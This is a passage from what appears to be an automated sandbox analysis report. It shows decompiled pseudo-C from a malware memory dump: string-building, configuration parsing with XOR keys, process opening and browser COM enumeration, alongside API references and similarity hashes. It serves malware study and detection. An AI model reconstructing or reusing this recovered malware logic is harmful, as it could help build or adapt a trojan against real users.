                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F6CC0
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F6CC4
                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 033F6CF4
                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 033F6D03
                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,05F29630), ref: 033F6D13
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F6D24
                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 033F6D32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1837416118-0
                                                                                  • Opcode ID: 648f3d317277f185035b84fc286d4e9da026f70dea38c1c9040502353cf8d8ac
                                                                                  • Instruction ID: a660ed8e3805d73ce5fe099aabbaa8fbaf35243db57904c7149ae90ef433d75d
                                                                                  • Opcode Fuzzy Hash: 648f3d317277f185035b84fc286d4e9da026f70dea38c1c9040502353cf8d8ac
                                                                                  • Instruction Fuzzy Hash: B4716E72500205BFD761FB68ECCCE5AB7ECFB88314F890525F949C7218D639E9069BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E033F7D0C(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				long _v16;
                                                                                  				signed int _v20;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t42;
                                                                                  				intOrPtr _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  				void* _t48;
                                                                                  				int _t49;
                                                                                  				WCHAR* _t53;
                                                                                  				WCHAR* _t56;
                                                                                  				void* _t57;
                                                                                  				int _t58;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t69;
                                                                                  				void* _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				intOrPtr _t79;
                                                                                  				intOrPtr* _t85;
                                                                                  				WCHAR* _t88;
                                                                                  
                                                                                  				_t74 = __ecx;
                                                                                  				_t79 =  *0x33fd2ec; // 0x5f29c48
                                                                                  				_v20 = 8;
                                                                                  				_v16 = GetTickCount();
                                                                                  				_t42 = E033F2FF4(_t74,  &_v16);
                                                                                  				_v12 = _t42;
                                                                                  				if(_t42 == 0) {
                                                                                  					_v12 = 0x33fc1cc;
                                                                                  				}
                                                                                  				_t44 = E033F4D59(_t79);
                                                                                  				_v8 = _t44;
                                                                                  				if(_t44 != 0) {
                                                                                  					_t85 = __imp__;
                                                                                  					_t46 =  *_t85(_v12, _t69);
                                                                                  					_t47 =  *_t85(_v8);
                                                                                  					_t48 =  *_t85(_a4);
                                                                                  					_t49 = lstrlenW(_a8);
                                                                                  					_t53 = E033F75C4(lstrlenW(0x33fead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x33fead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                  					_v16 = _t53;
                                                                                  					if(_t53 != 0) {
                                                                                  						_t75 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t18 = _t75 + 0x33fead8; // 0x530025
                                                                                  						wsprintfW(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                  						_t56 =  *_t85(_v8);
                                                                                  						_a8 = _t56;
                                                                                  						_t57 =  *_t85(_a4);
                                                                                  						_t58 = lstrlenW(_a12);
                                                                                  						_t88 = E033F75C4(lstrlenW(0x33febf8) + _a8 + _t57 + _t58 + lstrlenW(0x33febf8) + _a8 + _t57 + _t58 + 2);
                                                                                  						if(_t88 == 0) {
                                                                                  							E033F4C31(_v16);
                                                                                  						} else {
                                                                                  							_t64 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							_t31 = _t64 + 0x33febf8; // 0x73006d
                                                                                  							wsprintfW(_t88, _t31, _a4, _v8, _a12);
                                                                                  							 *_a16 = _v16;
                                                                                  							_v20 = _v20 & 0x00000000;
                                                                                  							 *_a20 = _t88;
                                                                                  						}
                                                                                  					}
                                                                                  					E033F4C31(_v8);
                                                                                  				}
                                                                                  				return _v20;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 033F7D21
                                                                                  • lstrlen.KERNEL32(00000000,80000002), ref: 033F7D5C
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7D65
                                                                                  • lstrlen.KERNEL32(00000000), ref: 033F7D6C
                                                                                  • lstrlenW.KERNEL32(80000002), ref: 033F7D7A
                                                                                  • lstrlenW.KERNEL32(033FEAD8), ref: 033F7D83
                                                                                  • wsprintfW.USER32 ref: 033F7DBF
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7DC7
                                                                                  • lstrlen.KERNEL32(?), ref: 033F7DCF
                                                                                  • lstrlenW.KERNEL32(?), ref: 033F7DDA
                                                                                  • lstrlenW.KERNEL32(033FEBF8), ref: 033F7DE3
                                                                                  • wsprintfW.USER32 ref: 033F7E0D
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                                                  • String ID:
                                                                                  • API String ID: 822878831-0
                                                                                  • Opcode ID: 3faed17b759232b041687c5e5fe70b203652f7464d7ae7c1a49faf91d65281d4
                                                                                  • Instruction ID: f8b272ebac6bc5c08d47ac464b3562266e1b2d9cd6080065b5e8c68ea3bfadc4
                                                                                  • Opcode Fuzzy Hash: 3faed17b759232b041687c5e5fe70b203652f7464d7ae7c1a49faf91d65281d4
                                                                                  • Instruction Fuzzy Hash: CC312776D00219BFCF01EFA4CC8499EBBB9EF48358B4540A5EA14A7221DB35DA15EF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E033F140D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _t9;
                                                                                  				intOrPtr _t13;
                                                                                  				char* _t28;
                                                                                  				void* _t33;
                                                                                  				void* _t34;
                                                                                  				char* _t36;
                                                                                  				intOrPtr* _t40;
                                                                                  				char* _t41;
                                                                                  				char* _t42;
                                                                                  				char* _t43;
                                                                                  
                                                                                  				_t34 = __edx;
                                                                                  				_push(__ecx);
                                                                                  				_t9 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t1 = _t9 + 0x33fe61b; // 0x253d7325
                                                                                  				_t36 = 0;
                                                                                  				_t28 = E033F5680(__ecx, _t1);
                                                                                  				if(_t28 != 0) {
                                                                                  					_t40 = __imp__;
                                                                                  					_t13 =  *_t40(_t28);
                                                                                  					_v8 = _t13;
                                                                                  					_t6 =  *_t40(_a4) + 1; // 0x5f29631
                                                                                  					_t41 = E033F75C4(_v8 + _t6);
                                                                                  					if(_t41 != 0) {
                                                                                  						strcpy(_t41, _t28);
                                                                                  						_pop(_t33);
                                                                                  						__imp__(_t41, _a4);
                                                                                  						_t36 = E033FA7A2(_t34, _t41, _a8);
                                                                                  						E033F4C31(_t41);
                                                                                  						_t42 = E033F8668(StrTrimA(_t36, "="), _t36);
                                                                                  						if(_t42 != 0) {
                                                                                  							E033F4C31(_t36);
                                                                                  							_t36 = _t42;
                                                                                  						}
                                                                                  						_t43 = E033F71BA(_t36, _t33);
                                                                                  						if(_t43 != 0) {
                                                                                  							E033F4C31(_t36);
                                                                                  							_t36 = _t43;
                                                                                  						}
                                                                                  					}
                                                                                  					E033F4C31(_t28);
                                                                                  				}
                                                                                  				return _t36;
                                                                                  			}















                                                                                  APIs
                                                                                    • Part of subcall function 033F5680: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,033F1427,253D7325,00000000,00000000,00000000,?,00000000,033F6C79), ref: 033F56E7
                                                                                    • Part of subcall function 033F5680: sprintf.NTDLL ref: 033F5708
                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                  • lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • strcpy.NTDLL ref: 033F1457
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033FA7A2: lstrlen.KERNEL32(00000000,00000000,033F6C79,033F6C79,00000001,00000000,00000000,?,033F1471,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033FA7B9
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                    • Part of subcall function 033F8668: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,033F148B,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F8672
                                                                                    • Part of subcall function 033F8668: _snprintf.NTDLL ref: 033F86D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                  • String ID: =
                                                                                  • API String ID: 2864389247-1428090586
                                                                                  • Opcode ID: 5de6cd45774ae0b6a8f5595660754b7b510d03d4f805bb7dddcbe83ef2a089a6
                                                                                  • Instruction ID: 9ac37eaede968c9c158470b621aa613b074c994f016a6389909d7580e2978a93
                                                                                  • Opcode Fuzzy Hash: 5de6cd45774ae0b6a8f5595660754b7b510d03d4f805bb7dddcbe83ef2a089a6
                                                                                  • Instruction Fuzzy Hash: A8115137E017297F8612FBA59CC4C7F66ADDE85B603895125FB04AF200DE28CD06A7E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E033F58CA(int* __ecx) {
                                                                                  				int _v8;
                                                                                  				void* _v12;
                                                                                  				void* __esi;
                                                                                  				signed int _t20;
                                                                                  				signed int _t25;
                                                                                  				char* _t31;
                                                                                  				char* _t32;
                                                                                  				char* _t33;
                                                                                  				char* _t34;
                                                                                  				char* _t35;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  				intOrPtr _t38;
                                                                                  				signed int _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  				signed int _t49;
                                                                                  				signed int _t53;
                                                                                  				signed int _t57;
                                                                                  				signed int _t61;
                                                                                  				signed int _t65;
                                                                                  				signed int _t69;
                                                                                  				void* _t74;
                                                                                  				intOrPtr _t90;
                                                                                  
                                                                                  				_t75 = __ecx;
                                                                                  				_t20 =  *0x33fd22c; // 0x63699bc3
                                                                                  				if(E033F33AC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                                                  					 *0x33fd280 = _v12;
                                                                                  				}
                                                                                  				_t25 =  *0x33fd22c; // 0x63699bc3
                                                                                  				if(E033F33AC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                                                  					_push(2);
                                                                                  					_pop(0);
                                                                                  					goto L48;
                                                                                  				} else {
                                                                                  					_t74 = _v12;
                                                                                  					if(_t74 == 0) {
                                                                                  						_t31 = 0;
                                                                                  					} else {
                                                                                  						_t69 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t31 = E033F1273(_t75, _t74, _t69 ^ 0x724e87bc);
                                                                                  					}
                                                                                  					if(_t31 != 0) {
                                                                                  						_t75 =  &_v8;
                                                                                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                  							 *0x33fd1f8 = _v8;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t32 = 0;
                                                                                  					} else {
                                                                                  						_t65 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t32 = E033F1273(_t75, _t74, _t65 ^ 0x2b40cc40);
                                                                                  					}
                                                                                  					if(_t32 != 0) {
                                                                                  						_t75 =  &_v8;
                                                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                  							 *0x33fd1fc = _v8;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t33 = 0;
                                                                                  					} else {
                                                                                  						_t61 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t33 = E033F1273(_t75, _t74, _t61 ^ 0x3b27c2e6);
                                                                                  					}
                                                                                  					if(_t33 != 0) {
                                                                                  						_t75 =  &_v8;
                                                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                  							 *0x33fd200 = _v8;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t34 = 0;
                                                                                  					} else {
                                                                                  						_t57 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t34 = E033F1273(_t75, _t74, _t57 ^ 0x0602e249);
                                                                                  					}
                                                                                  					if(_t34 != 0) {
                                                                                  						_t75 =  &_v8;
                                                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                                                  							 *0x33fd004 = _v8;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t35 = 0;
                                                                                  					} else {
                                                                                  						_t53 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t35 = E033F1273(_t75, _t74, _t53 ^ 0x3603764c);
                                                                                  					}
                                                                                  					if(_t35 != 0) {
                                                                                  						_t75 =  &_v8;
                                                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                                                  							 *0x33fd02c = _v8;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t36 = 0;
                                                                                  					} else {
                                                                                  						_t49 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t36 = E033F1273(_t75, _t74, _t49 ^ 0x2cc1f2fd);
                                                                                  					}
                                                                                  					if(_t36 != 0) {
                                                                                  						_push(_t36);
                                                                                  						_t46 = 0x10;
                                                                                  						_t47 = E033F73B3(_t46);
                                                                                  						if(_t47 != 0) {
                                                                                  							_push(_t47);
                                                                                  							E033F10E4();
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t74 == 0) {
                                                                                  						_t37 = 0;
                                                                                  					} else {
                                                                                  						_t44 =  *0x33fd22c; // 0x63699bc3
                                                                                  						_t37 = E033F1273(_t75, _t74, _t44 ^ 0xb30fc035);
                                                                                  					}
                                                                                  					if(_t37 != 0 && E033F73B3(0, _t37) != 0) {
                                                                                  						_t90 =  *0x33fd2dc; // 0x5f29630
                                                                                  						E033F5B10(_t90 + 4, _t42);
                                                                                  					}
                                                                                  					_t38 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t18 = _t38 + 0x33fe2d2; // 0x5f2887a
                                                                                  					_t19 = _t38 + 0x33fe7c4; // 0x6976612e
                                                                                  					 *0x33fd27c = _t18;
                                                                                  					 *0x33fd2f4 = _t19;
                                                                                  					HeapFree( *0x33fd1f0, 0, _t74);
                                                                                  					L48:
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}



























                                                                                  0x033f5a51
                                                                                  0x033f5a4e
                                                                                  0x033f5a58
                                                                                  0x033f5a6e
                                                                                  0x033f5a5a
                                                                                  0x033f5a5a
                                                                                  0x033f5a67
                                                                                  0x033f5a67
                                                                                  0x033f5a72
                                                                                  0x033f5a80
                                                                                  0x033f5a8a
                                                                                  0x033f5a8a
                                                                                  0x033f5a8f
                                                                                  0x033f5a95
                                                                                  0x033f5aa2
                                                                                  0x033f5aa8
                                                                                  0x033f5aae
                                                                                  0x033f5ab3
                                                                                  0x033f5ac0
                                                                                  0x033f5ac4
                                                                                  0x033f5ac4

                                                                                  APIs
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F594F
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5981
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F59B3
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F59E5
                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,033F79CC,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5A17
                                                                                  • HeapFree.KERNEL32(00000000,?,?,033F79CC,63699BC3,?,033F79CC,63699BC3,E8FA7DD7,033FD00C,745EC740,?,?,033F79CC), ref: 033F5AB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: ae680b7dc42676eaa552b8adc2047e48103ce5a442800ede0f8ad63e414bce4a
                                                                                  • Instruction ID: 58ec5d18c1c4f42310cb9b5b674c4997cdfc666808067ac1da4276a052bf63e4
                                                                                  • Opcode Fuzzy Hash: ae680b7dc42676eaa552b8adc2047e48103ce5a442800ede0f8ad63e414bce4a
                                                                                  • Instruction Fuzzy Hash: C8519375E10205FFEB15EBB8DDC8C5FB7EDEB49240BE80A26A602D7108E630D9019B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7A5D(intOrPtr _a4) {
                                                                                  				void* _t2;
                                                                                  				long _t4;
                                                                                  				void* _t5;
                                                                                  				long _t6;
                                                                                  				void* _t7;
                                                                                  
                                                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *0x33fd224 = _t2;
                                                                                  				if(_t2 == 0) {
                                                                                  					return GetLastError();
                                                                                  				}
                                                                                  				_t4 = GetVersion();
                                                                                  				if(_t4 <= 5) {
                                                                                  					_t5 = 0x32;
                                                                                  					return _t5;
                                                                                  				}
                                                                                  				 *0x33fd214 = _t4;
                                                                                  				_t6 = GetCurrentProcessId();
                                                                                  				 *0x33fd210 = _t6;
                                                                                  				 *0x33fd21c = _a4;
                                                                                  				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                  				 *0x33fd20c = _t7;
                                                                                  				if(_t7 == 0) {
                                                                                  					 *0x33fd20c =  *0x33fd20c | 0xffffffff;
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}









                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,033F8753,?,?,00000001), ref: 033F7A65
                                                                                  • GetVersion.KERNEL32(?,00000001), ref: 033F7A74
                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001), ref: 033F7A83
                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 033F7AA0
                                                                                  • GetLastError.KERNEL32(?,00000001), ref: 033F7ABF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2270775618-0
                                                                                  • Opcode ID: 1c8f0ae3563a36000db3a0942452a3c36537d2c837de5da65ad608bea2c73178
                                                                                  • Instruction ID: b971bfb8dbe78d7a767139cc17b1a5bc1ad4010849b895d8fb589dfb018ca616
                                                                                  • Opcode Fuzzy Hash: 1c8f0ae3563a36000db3a0942452a3c36537d2c837de5da65ad608bea2c73178
                                                                                  • Instruction Fuzzy Hash: AAF0F470690306BFD710EB38AD8DB183BACE704781F958629E216C52CCE675C2028B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E033F14BD(intOrPtr* __eax) {
                                                                                  				void* _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				void* _v16;
                                                                                  				char _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _v32;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v48;
                                                                                  				intOrPtr _v56;
                                                                                  				short _v64;
                                                                                  				intOrPtr* _t54;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t57;
                                                                                  				intOrPtr* _t58;
                                                                                  				intOrPtr* _t60;
                                                                                  				void* _t61;
                                                                                  				intOrPtr* _t63;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr* _t67;
                                                                                  				intOrPtr* _t69;
                                                                                  				intOrPtr* _t71;
                                                                                  				intOrPtr* _t74;
                                                                                  				intOrPtr* _t76;
                                                                                  				intOrPtr _t78;
                                                                                  				intOrPtr* _t82;
                                                                                  				intOrPtr* _t86;
                                                                                  				intOrPtr _t102;
                                                                                  				intOrPtr _t108;
                                                                                  				void* _t117;
                                                                                  				void* _t121;
                                                                                  				void* _t122;
                                                                                  				intOrPtr _t129;
                                                                                  
                                                                                  				_t122 = _t121 - 0x3c;
                                                                                  				_push( &_v8);
                                                                                  				_push(__eax);
                                                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                  				if(_t117 >= 0) {
                                                                                  					_t54 = _v8;
                                                                                  					_t102 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t5 = _t102 + 0x33fe038; // 0x3050f485
                                                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                  					_t56 = _v8;
                                                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                  					if(_t117 >= 0) {
                                                                                  						__imp__#2(0x33fc2c8);
                                                                                  						_v28 = _t57;
                                                                                  						if(_t57 == 0) {
                                                                                  							_t117 = 0x8007000e;
                                                                                  						} else {
                                                                                  							_t60 = _v32;
                                                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                  							_t86 = __imp__#6;
                                                                                  							_t117 = _t61;
                                                                                  							if(_t117 >= 0) {
                                                                                  								_t63 = _v24;
                                                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                  								if(_t117 >= 0) {
                                                                                  									_t129 = _v20;
                                                                                  									if(_t129 != 0) {
                                                                                  										_v64 = 3;
                                                                                  										_v48 = 3;
                                                                                  										_v56 = 0;
                                                                                  										_v40 = 0;
                                                                                  										if(_t129 > 0) {
                                                                                  											while(1) {
                                                                                  												_t67 = _v24;
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												_t122 = _t122;
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												asm("movsd");
                                                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                                                  												if(_t117 < 0) {
                                                                                  													goto L16;
                                                                                  												}
                                                                                  												_t69 = _v8;
                                                                                  												_t108 =  *0x33fd230; // 0x2b2a5a8
                                                                                  												_t28 = _t108 + 0x33fe0bc; // 0x3050f1ff
                                                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                                                  												if(_t117 >= 0) {
                                                                                  													_t74 = _v16;
                                                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                                                  														_t78 =  *0x33fd230; // 0x2b2a5a8
                                                                                  														_t33 = _t78 + 0x33fe078; // 0x76006f
                                                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                  															_t82 = _v16;
                                                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                                                  														}
                                                                                  														 *_t86(_v12);
                                                                                  													}
                                                                                  													_t76 = _v16;
                                                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                                                  												}
                                                                                  												_t71 = _v8;
                                                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                  												_v40 = _v40 + 1;
                                                                                  												if(_v40 < _v20) {
                                                                                  													continue;
                                                                                  												}
                                                                                  												goto L16;
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								L16:
                                                                                  								_t65 = _v24;
                                                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                  							}
                                                                                  							 *_t86(_v28);
                                                                                  						}
                                                                                  						_t58 = _v32;
                                                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                  					}
                                                                                  				}
                                                                                  				return _t117;
                                                                                  			}




































                                                                                  0x033f15d4
                                                                                  0x033f15d8
                                                                                  0x033f15e0
                                                                                  0x033f15e5
                                                                                  0x033f15f7
                                                                                  0x033f15f9
                                                                                  0x033f15ff
                                                                                  0x033f15ff
                                                                                  0x033f1608
                                                                                  0x033f1608
                                                                                  0x033f160a
                                                                                  0x033f1610
                                                                                  0x033f1610
                                                                                  0x033f1613
                                                                                  0x033f1619
                                                                                  0x033f161c
                                                                                  0x033f1625
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f1625
                                                                                  0x033f1579
                                                                                  0x033f1573
                                                                                  0x033f155b
                                                                                  0x033f162b
                                                                                  0x033f162b
                                                                                  0x033f1631
                                                                                  0x033f1631
                                                                                  0x033f1637
                                                                                  0x033f1637
                                                                                  0x033f1640
                                                                                  0x033f1646
                                                                                  0x033f1646
                                                                                  0x033f1502
                                                                                  0x033f164f

                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(033FC2C8), ref: 033F150D
                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 033F15EF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F1608
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F1637
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1885612795-0
                                                                                  • Opcode ID: 742403ffb6645ad21877b8464a8f8c0c7a8dafce2cc8100fd0c0b5fa9f4a9c4b
